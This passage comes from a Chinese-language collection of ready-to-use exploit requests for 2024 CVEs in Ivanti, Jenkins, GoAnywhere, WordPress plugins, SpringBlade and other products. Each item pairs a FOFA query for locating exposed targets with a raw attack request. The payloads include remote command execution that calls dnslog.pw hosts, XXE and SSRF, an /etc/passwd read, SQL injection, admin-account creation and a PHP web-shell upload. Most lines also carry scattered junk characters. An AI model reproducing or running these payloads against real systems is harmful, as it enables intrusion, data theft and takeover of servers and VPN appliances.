Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ R" n2 d% P+ M( N) t
Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ [% v+ a# q" s, ?; V7 V
X-Requested-With: XMLHttpRequest! ~; |5 z9 l+ t% ^! k' A1 S
6 d' b9 l: s1 q
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B4 I ]3 X' w+ K' C/ m
$ W. `$ L& O& f5 Q1 n# V& I$ q
9 L' d7 y! h; m% T2 K2 B7 U( n
99. Ncast盈可视高清智能录播系统busiFacade RCE
: ^0 e4 |: v6 {+ d6 W1 V2 j7 E& M/ qCVE-2024-0305& k- @* o8 y. r Z
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
0 W h7 Y; H8 d5 T% |, q/ fPOST /classes/common/busiFacade.php HTTP/1.1
( X# m1 y1 e, Q |/ ~; [Host: 192.168.40.130:8080! W: X/ \! z) p" Y/ G" B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 T( ^& a1 a" v4 |. c
Connection: close/ V/ Z& T1 B6 h: Z X. n4 P
Content-Length: 154
}+ L( P4 f0 I; t. _$ sAccept: */*
1 h$ I, d4 J: o5 j$ R5 \Accept-Encoding: gzip, deflate, j: G; ^4 ?; U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. u* c- z% r9 p) p( UContent-Type: application/x-www-form-urlencoded; charset=UTF-8$ v s `' |6 v6 k
X-Requested-With: XMLHttpRequest& h7 q9 K& ~$ V J+ N
- ~ t' H$ w# q& P5 F2 l6 S- z
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D! \4 O' j9 y: N* b& o& F
6 K( k. ?: I2 @( t- L: z% H8 N5 u( ?
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 n3 ]9 I) N7 c, N g# M$ eCVE-2024-03520 e* T8 {5 A* I2 W" U
FOFA:icon_hash="874152924"
+ W. C5 F# i) J! ]0 x+ mPOST /api/file/formimage HTTP/1.19 i( x9 s: Z0 h. B. l1 k# y* ]8 G
Host: 192.168.40.130( {/ p |2 ?0 i, z: X3 _; {. v
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
. ~- q+ \6 F- \# U% B" E9 MConnection: close
2 j; o- T9 s! p1 GContent-Length: 201- L* N7 N) n8 p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
- H$ @ \6 G: K2 ]; }. aAccept-Encoding: gzip/ h0 p X, J% Z& c: ] @
1 T4 |7 o* N; S# y9 c
------WebKitFormBoundarygcflwtei4 N* J, z; e" Q1 h4 e, [
Content-Disposition: form-data; name="file";filename="IE4MGP.php"' ^# \4 v3 z/ q" M
Content-Type: application/x-php
i' `4 ]& |2 s# o
1 b2 {, k! g4 G* i* G% k! f. X2ayyhRXiAsKXL8olvF5s4qqyI2O' ~/ U! d* p( Q; u
------WebKitFormBoundarygcflwtei--
: P! F7 y7 _ ~/ V/ O# K8 c3 @8 Y( I/ i2 W' N) ]/ T
2 }" Z# B# `& l4 a0 M101. ivanti policy secure-22.6命令注入
/ |; y( I0 O" V) t6 K/ U) VCVE-2024-21887
* p1 n2 r& |- T; w# P0 DFOFA:body="welcome.cgi?p=logo"
. [. ?* t3 j3 A0 [: }; \4 gGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
5 x9 |0 j& C9 k! Z; THost: x.x.x.xx.x.x.x" c# ?/ d4 i, m8 r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% x# T7 W( [5 L: |# ~! i% ^
Connection: close( p4 T. n* x* K8 v0 W: t
Accept-Encoding: gzip
8 t. t( ?& c/ r, m' {0 I
- l9 x: @6 p: j. \6 F% a& P' k2 I0 y) i8 \' y, i* k2 \7 n
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行# |1 H7 h$ g4 h# A% X6 s
CVE-2024-21893
9 b5 C( ]( t7 s- N! ], e" h3 y9 L, JFOFA:body="welcome.cgi?p=logo"# J- Q# D0 N- H0 P" S
POST /dana-ws/saml20.ws HTTP/1.1% P* F2 Z6 H) N+ w0 Q/ h
Host: x.x.x.x x- D" T" h1 n: h# ?0 v9 m% Q% a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! p* H& }, e* w: `9 U! {8 Z* u3 }, H
Connection: close
, h3 Q9 Z( N3 e/ w: dContent-Length: 792
) E5 |* `3 J4 `+ z% w( }Accept-Encoding: gzip. P3 J: V& H! T- \, s' v5 Q
' w) ~9 q. k6 P6 o8 f# c<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>* \4 P( }% q4 Q3 h$ _, M) ?' F
2 o3 h$ ^# B# F) l6 C' n
103. Ivanti Pulse Connect Secure VPN XXE
2 @2 a5 x" e* I& I& \/ t& x9 }CVE-2024-22024
% e# l( @9 |5 I- iFOFA:body="welcome.cgi?p=logo"7 p ? v1 j0 s L+ ]
POST /dana-na/auth/saml-sso.cgi HTTP/1.1. p& b9 J7 R% [$ }* j4 _% E
Host: 192.168.40.130:111! l. W& {0 Q3 |- \
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
9 ?& Y/ u L0 E# Q! @# JConnection: close' f* l- [/ L" k. b) [+ n; a
Content-Length: 204
! i) i8 I. W2 d8 C4 cContent-Type: application/x-www-form-urlencoded- F3 f1 w) |" j' N6 z! B2 ^
Accept-Encoding: gzip
- T& s+ P7 F2 _
" K9 F! X9 D! q e9 I6 Q3 {! zSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==5 b2 P+ C1 N& g
+ G" m2 N; }% D, e
8 R: |! |3 x' m9 h! R其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
: m, {+ g8 A( L% U9 Z- f! i4 V<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>1 p) ?1 Z, r. B, w4 q
" A3 P6 w$ f5 l7 r: ^: t7 y7 M
* m4 l8 k( K4 A+ ?$ P: A
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 ^& k$ m+ x6 N* W/ lCVE-2024-0569
$ @# v$ ^4 n4 BFOFA:title="TOTOLINK"
! D: y8 _* t# M* N- FPOST /cgi-bin/cstecgi.cgi HTTP/1.1
6 L9 ^5 y& w }9 [+ @Host:192.168.0.1
& I7 S& |1 J/ Q+ T3 d( l0 jContent-Length:41
+ ^; H1 ?, z" h7 ~Accept:application/json,text/javascript,*/*;q=0.01
% X& k2 G5 N, x) t# LX-Requested-with: XMLHttpRequest; S+ w, ?- P: D
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
$ I+ j( @! Y; k* c$ D9 oContent-Type: application/x-www-form-urlencoded:charset=UTF-86 m% R" [: x: [( a" x
Origin: http://192.168.0.1
& W1 H" Z* o b7 Y( W8 J6 KReferer: http://192.168.0.1/advance/index.html?time=1671152380564
8 w3 c+ g, D8 V) T# U' o8 CAccept-Encoding:gzip,deflate
* u& z, B7 @$ g: |3 _ z. nAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
4 J$ ~$ [: s9 k9 X/ hConnection:close' s9 R2 P$ p: x( `
0 e: L- J9 e9 U2 I2 w" `& y{
; M5 w; y( |* J ~7 h/ L: `: c"topicurl":"getSysStatusCfg",0 ?3 M/ ^8 k7 x6 g, |9 h8 c
"token":""
5 e/ ~* I0 T, L6 y' m. @}. g3 }7 `: D. C1 A- S) O
' r) a' x# N# a4 L5 Y% G# g0 U
105. SpringBlade v3.2.0 export-user SQL 注入
% z4 O* `8 z6 [; H" PFOFA:body="https://bladex.vip" S) S7 p H2 x. [: }1 R4 n5 q
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=19 A* r% `4 ?, C: V% t
% y- E7 i9 r- U# k) K6 O
106. SpringBlade dict-biz/list SQL 注入
" u' C& P; D" ]' f2 lFOFA:body="Saber 将不能正常工作"
$ v& Y% [; a& b( G: p" KGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! Q; Y9 o8 g- R4 p7 O2 }9 vHost: your-ip
: u. T* y, m; X" E: s" k- kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 x. ?1 z6 h2 U, n( L) i
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A7 e5 {, c( Y7 P6 x
Accept-Encoding: gzip, deflate9 v3 `7 P, r+ g) k) \6 Y
Accept-Language: zh-CN,zh;q=0.9
& H; {8 Z" G( D& Y+ [Connection: close
o" d& k7 @) ^5 {& ~& ?7 b5 o" d
# B; {0 j) W) `, [# d" \
# d5 g* O i. D G% t107. SpringBlade tenant/list SQL 注入
4 O9 p, B- H! G* xFOFA:body="https://bladex.vip"
R0 x; }1 x' _5 R6 O/ aGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
% } i3 V) f5 u3 z* h( sHost: your-ip
! j- }6 T, ~! h ?- WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ S0 K2 `4 {8 B
Blade-Auth:替换为自己的
% i3 C0 f' y! p* N7 xConnection: close" G7 f) a" M5 [0 |* z( X" X
7 a8 v' G5 J. ?, k- V1 ], I" Y0 v( p
6 ~2 P% e( ]5 q- m h: ?& j
108. D-Tale 3.9.0 SSRF
; ?* a R. [- E+ o; g/ wCVE-2024-21642
# x; a6 ? t% [" h# f- q8 BFOFA:"dtale/static/images/favicon.png"" ^ x$ B* A# i$ |& B
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
# m7 A. q9 k( bHost: your-ip
) r" a4 f! m: m. ?Accept: application/json, text/plain, */*7 T! t/ |; U$ ^1 _$ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, Y, ?. X$ a) v! m% vAccept-Encoding: gzip, deflate
* U% |& f1 e# u% Y- Z$ WAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 \0 v7 ?/ `* gConnection: close
) K6 Q' a" J% P% T; F' L& h5 P- x. V2 R( P
& p h. G4 ], Y8 O109. Jenkins CLI 任意文件读取: S( |& i, u% H2 K; M
CVE-2024-23897
+ M z/ n7 Z& D+ K& P' wFOFA:header="X-Jenkins"3 K; e# }( d( Q* p/ P
POST /cli?remoting=false HTTP/1.1
3 J8 Z' ?, H+ T# t2 {Host:. [$ I" T, u: w' f& X
Content-type: application/octet-stream- [5 q2 c/ d- Q( q& S. p) [
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92' w, W+ s2 ?/ I& b" \
Side: upload$ U( T, K ~. ^) E8 E
Connection: keep-alive5 v5 ~2 o9 }* u/ t
Content-Length: 1636 w6 Y7 @7 U4 N& N& D; b' v) v
& H5 l9 ~9 z1 Ib'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03': q2 v0 _$ i& T2 |0 A# x, W
1 a6 y" |% w, c' y
0 j* E1 i/ U( B D- j
POST /cli?remoting=false HTTP/1.10 F2 s/ H% g& m, F" Q* V
Host:/ ]% d( F! r8 V& M2 h' f K
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92% @" ~8 E5 D% E n
download
( y0 v; @ O$ V+ n: S3 k: ]4 eContent-Type: application/x-www-form-urlencoded
+ T3 X. x, |; G. q8 PContent-Length: 0: E& `; I$ Q" t& \7 g5 ?! L9 C4 x
8 J& g5 c4 g# e+ j' B
5 U! u" j! b/ M b+ D- @ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2 w2 ?0 b, J# M B; {) W2 j" K6 l. y6 m' Wjava -jar jenkins-cli.jar help4 ~# o6 y( Y9 a2 b( H8 g
[COMMAND]) h' ^4 C& A: l$ |
Lists all the available commands or a detailed description of single command.6 k* [+ t V! U0 H# z' M
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
' R9 Q6 X- m. U3 I; |7 f* [% ?& m; V3 G+ s4 W
0 P% G0 T) Q3 y" L& [
110. Goanywhere MFT 未授权创建管理员
+ t6 \6 H0 K. }' x5 B% bCVE-2024-0204) _$ Q5 y% H8 G3 P
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
2 u0 I4 M/ x) b, i% w4 H) KGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
* j0 W y' ~; O [Host: 192.168.40.130:8000
' O7 [+ m! F8 n& {6 r" pUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.362 ]3 b+ s: } z2 u) J6 x
Connection: close5 `* E+ k7 Z" r5 I# S- N9 M
Accept: */*
% j6 q; J+ g2 lAccept-Language: en& B: F4 j8 b L" N9 ~* U
Accept-Encoding: gzip2 x% K* t, _2 m) T
5 V6 h) l/ u. D3 I6 p1 h( d7 r; k5 k6 Q2 j: Y
111. WordPress Plugin HTML5 Video Player SQL注入- ` e( p3 e ?2 n. m
CVE-2024-1061+ ]# ]( W! a' u" a+ B; r. l
FOFA:"wordpress" && body="html5-video-player"5 d7 i$ @% L% `4 K' g( j
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ i+ q5 f5 F v1 ~2 O
Host: 192.168.40.130:112
1 A" M* f; N2 t# [' wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 D, ^/ s6 e; t, t4 a4 V6 ^2 IConnection: close
+ [6 e+ H# P x9 t4 QAccept: */*' J/ D( \# z+ b7 f7 m
Accept-Language: en
5 d' U' |) ]# `: zAccept-Encoding: gzip! T4 N/ F0 ~. p0 w. F2 s# D' s. e
7 l& Q% C1 U% }3 f2 t) W* v* p
9 z* r* ?- l' P, ^& v) Z
112. WordPress Plugin NotificationX SQL 注入
7 a- e3 I9 [6 sCVE-2024-1698
6 C- N/ u0 K/ \+ b# b$ i1 m/ lFOFA:body="/wp-content/plugins/notificationx"8 m6 {6 i) w4 U8 f
POST /wp-json/notificationx/v1/analytics HTTP/1.1& t+ ^8 s6 U D# n/ |
Host: {{Hostname}} A9 T* T0 f0 K6 i7 I, A
Content-Type: application/json1 C0 \/ G' e0 D
( ~" T7 P; ^, T" T; t. @{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}2 d8 L2 x& p {1 ?: Y1 y
* d" I ]) C- U) _ |
7 x1 P) \& Q1 O$ r) J! ?; b8 ^
113. WordPress Automatic 插件任意文件下载和SSRF$ U9 H( e( I! J: v' j9 O; Q; [& }
CVE-2024-27954( _5 ~. B: I# s6 ~; v: [
FOFA:"/wp-content/plugins/wp-automatic"
; P* G; t! @0 rGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.19 M% @6 Q1 G0 y2 D9 l
Host: x.x.x.x a& g: O. |7 X6 R8 e# V" D
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
2 y+ P* L1 [+ C% B! J. [Connection: close; X2 u$ T& Q3 z3 ~
Accept: */*
$ |4 d7 w6 ]! p8 D Q& S, n+ d. J- GAccept-Language: en/ n* o, K" t0 _0 U5 B( K+ ]
Accept-Encoding: gzip! x# _6 p, G* I) Y2 d6 a0 T& A
b3 {* O: b, q+ q# ~- y
9 t* v1 R( B6 P |7 `3 b114. WordPress MasterStudy LMS插件 SQL注入
7 c) ?! U; d& `8 e8 R8 z8 Y' U) wFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
' Z" u) n' d2 J" c! s5 t: gGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
* g( L9 s/ Y6 b9 l) `- mHost: your-ip9 ^: H9 S0 ~+ G; n+ \& j, F$ k
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 j2 l4 D# ?1 P0 b0 ~6 r
Accept-Charset: utf-8; [4 J3 ]6 @9 g1 F) t) T. y
Accept-Encoding: gzip, deflate* w# ]3 |, ]! c) J% ?% W4 ?
Connection: close
- z, ~" o; B: f; o; [ t
9 t( i2 z, z, ?$ M4 ^% l
+ W& Z6 d# V. s/ _6 T* g3 K# P115. WordPress Bricks Builder <= 1.9.6 RCE( l/ X! l# C `$ h# x1 U
CVE-2024-25600
5 V4 Y. |5 U2 R: E' I# k. eFOFA: body="/wp-content/themes/bricks/"
$ k& x5 g- h. c+ A第一步,获取网站的nonce值) M9 Z8 K, n; q) [
GET / HTTP/1.1 B* U; M, V# ^2 Y2 }
Host: x.x.x.x
7 _( y3 @" }' ~: ]9 H# M. i; FUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
1 V8 Z0 o. n* mConnection: close3 M* k$ \8 l8 Q( U! l8 k
Accept-Encoding: gzip
/ z8 ~" Q0 N* m
' U5 M/ l0 i+ ]- G5 R: T& `
0 o) Z2 b9 l# x# l0 z第二步替换nonce值,执行命令8 R4 I8 J+ m, m3 t T* p5 a
POST /wp-json/bricks/v1/render_element HTTP/1.1
! t0 _; v3 E- p( x0 ]8 Q* XHost: x.x.x.x. X2 u7 Y9 }1 _/ v3 e+ x7 O, P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# [9 U% I/ a9 Y: s2 }
Connection: close; C0 q% v$ P& {5 f6 m* ^% E1 G
Content-Length: 356
0 J8 K1 m$ E8 p+ zContent-Type: application/json
) R6 h: x2 E! J' s3 a& d dAccept-Encoding: gzip
3 p q) w W( \8 Q, f' v$ H; @5 |; ~
{
& P# q; Y& @! j"postId": "1",$ ]: W% x; Q) X: d8 h" \% U
"nonce": "第一步获得的值",
( N' p F% p( y" w; \4 | "element": {2 q& B5 z$ Q% f2 m
"name": "container",
9 S8 H( w9 {8 r1 t6 g1 u# q "settings": {
( d9 j4 p3 W0 i2 `* B "hasLoop": "true",
1 N' O! `6 F- }0 U3 ], z "query": {3 \/ G) A9 Q5 {
"useQueryEditor": true,
, F9 X1 F$ i- Y1 C; {/ r7 w/ X "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",* g2 ]. l) ?$ E Q$ P" q
"objectType": "post"5 N8 H3 `6 r7 ~! ~/ X! |* Y
}8 K) R! n9 B+ b1 Y* I9 @4 r
}+ `3 r2 O; d2 {9 c/ N: t) r4 a
}
4 I4 h9 i1 n0 Y* x2 X1 J' {3 s}- L5 W) q- C# X& w! [+ Y; X
* f/ |" E- M% k, n% B6 c) W, |
. u0 M0 m$ e, B7 |4 \8 } o( K0 m
116. wordpress js-support-ticket文件上传) R- W3 N" ~: m" G
FOFA:body="wp-content/plugins/js-support-ticket"* Z, q, q) h4 R& R) }: a
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.11 x8 c9 w& K, I7 o
Host:
& R i7 T4 ?& \2 {1 `6 n" P; @Content-Type: multipart/form-data; boundary=--------767099171* C+ O- F! x/ ~- E' \8 Y* R+ O
User-Agent: Mozilla/5.0; Q+ O$ `/ M: y/ m/ f; A: N& [
6 E* Y3 u Z1 {! z% h----------767099171! s7 C" }; F* Y8 M/ ] M
Content-Disposition: form-data; name="action"
& @6 X: j; a. v! T9 k, V J9 N+ Uconfiguration_saveconfiguration
9 P" _1 L5 G9 v7 `$ O% V* V----------767099171
0 c5 q. H0 L! C1 b- rContent-Disposition: form-data; name="form_request"
1 h/ y$ y5 h6 o7 M% q* M. Kjssupportticket
" r- l" ]0 O( S4 O----------767099171
) v/ ]% N1 Y4 i8 FContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"" e y% C; T9 P* L" ^! m9 C2 v" m
Content-Type: image/png% b6 ]5 z s3 Z4 Q$ f2 C# l
----------767099171--# P0 L! `) D1 r+ U- T, r0 _" O
* [( s$ p( u* ]! L
8 L+ I& p! x" p117. WordPress LayerSlider插件SQL注入
8 B/ ]6 J- T8 _0 R; S; p; p# V" Nversion:7.9.11 – 7.10.01 z2 a1 L* Q1 |8 `- U1 Q- H
FOFA:body="/wp-content/plugins/LayerSlider/"
& A: C, c5 }( uGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
! e. R1 x0 y8 b) AHost: your-ip1 T) g/ F% J; T2 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, ~. @2 D9 ~- p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! D( x; p* z' z) ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% l+ G' m2 I8 f: _8 a4 J. e5 i% QAccept-Encoding: gzip, deflate, br
3 W. k( F* c: |4 o0 \5 LConnection: close* P4 i- `+ A: O3 S
Upgrade-Insecure-Requests: 1; X2 U) c: e) T) b
! G7 l6 H. R) `# c) T# x# |- n
/ B3 X D: K2 {& J, i* [118. 北京百绰智能S210管理平台uploadfile.php任意文件上传8 G: }" h, `; {0 ]' D9 M
CVE-2024-0939% p4 Z6 s7 l* `5 Q- K3 F8 u. E' ]
FOFA:title="Smart管理平台"1 S- v: t0 p/ e/ e4 d6 T% x& q
POST /Tool/uploadfile.php? HTTP/1.11 M3 n5 h* |9 Z4 U
Host: 192.168.40.130:8443
2 R% S7 w1 O* ^. s4 \3 T1 GCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
0 h/ P8 V6 y& _+ I0 p. xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
) b {5 P8 D8 V7 a& } H" P. lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, r% W0 v( O0 ~ Q& ]! N) TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- q2 s9 `4 N {- ?- @# M
Accept-Encoding: gzip, deflate- u/ V/ H' W B; J5 L& M
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
$ I9 s; N! ~5 f4 B4 E3 B( ~: vContent-Length: 405
0 {. A+ u+ w) v6 h; t9 BOrigin: https://192.168.40.130:8443, H& Y% X3 l, S
Referer: https://192.168.40.130:8443/Tool/uploadfile.php, Z3 g9 Y- f6 A1 y
Upgrade-Insecure-Requests: 1# E$ A7 P# ?' g( h6 _
Sec-Fetch-Dest: document
: T0 F$ q1 B* X; PSec-Fetch-Mode: navigate
2 B T k. U2 j% J4 f; f% NSec-Fetch-Site: same-origin. H- v5 D( p/ R9 \$ |2 [" O' n/ }6 t
Sec-Fetch-User: ?13 v! c+ A! B3 |, i( j4 d
Te: trailers
~) ]3 T4 V0 B0 G: F2 OConnection: close' h9 V6 I% C; ^* X$ w" H
! j( c. q5 K4 h) e2 f/ O-----------------------------13979701222747646634037182887, d7 S8 G7 N& P& T/ I6 c
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
& y. X6 m% N! d& I3 x( Q# w' TContent-Type: application/octet-stream1 D/ p2 T, C. t+ P Z7 K/ b
" C) O8 u1 w9 g* `, m0 N
<?php; V3 Z6 Q% e6 L* L& x
system($_POST["passwd"]);8 A8 t4 a2 f# L8 l5 J5 f) X
?>
6 A$ {* s* i, k-----------------------------13979701222747646634037182887+ L( @" ]$ Y& _5 \% {) _
Content-Disposition: form-data; name="txt_path"
! r' E# K5 _& u3 i# C
. _* [7 C3 @7 M" h/home/src.php( {, h/ V* t+ f1 `
-----------------------------13979701222747646634037182887--) I+ |3 h7 S2 Q/ _( d
s; {) {9 a0 o2 m, n& V: K0 I. Y1 C8 }8 a" P; q/ z9 S
访问/home/src.php0 E. @4 _+ E( Z |
9 D( z8 \: N+ Q* }# k& ^
119. 北京百绰智能S20后台sysmanageajax.php sql注入( v" Q7 [& c# `# R
CVE-2024-1254
& ~# s# C) A) E8 DFOFA:title="Smart管理平台"/ x, F0 y, b8 {& b7 o: E( A1 ?
先登录进入系统,默认账号密码为admin/admin9 D, s& K# r" `# B* l) w! a$ @+ N5 g7 o
POST /sysmanage/sysmanageajax.php HTTP/1.11
* B" Y& T" A7 a/ AHost: x.x.x.x
6 b; R& b8 S7 I) _) kCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
8 U E/ e! q' p2 u" T3 ~& [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' V4 w! a) S! e$ U3 e/ N
Accept: */*9 p9 `% ~2 T: ?# M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ T _. S+ U4 R0 ^
Accept-Encoding: gzip, deflate
' Q" n6 T8 v! `3 j9 ^Content-Type: application/x-www-form-urlencoded;0 |) t p, i9 \7 [: J
Content-Length: 109
: A. b/ N$ ~0 \* b/ S/ o: wOrigin: https://58.18.133.60:8443
2 N" i3 z6 ~4 e8 fReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
) t4 y" d5 ]9 sSec-Fetch-Dest: empty
+ @5 }- l8 c$ q- D: ^/ e8 M: [Sec-Fetch-Mode: cors d* s- v3 K6 a+ O8 @5 [, j
Sec-Fetch-Site: same-origin! a) Y5 ? ~) j
X-Forwarded-For: 1.1.1.1) T8 H- t, G/ e. u0 c
X-Originating-Ip: 1.1.1.1
: {4 ]( `- \1 X; |1 WX-Remote-Ip: 1.1.1.13 A" x) H& \3 t" [& y
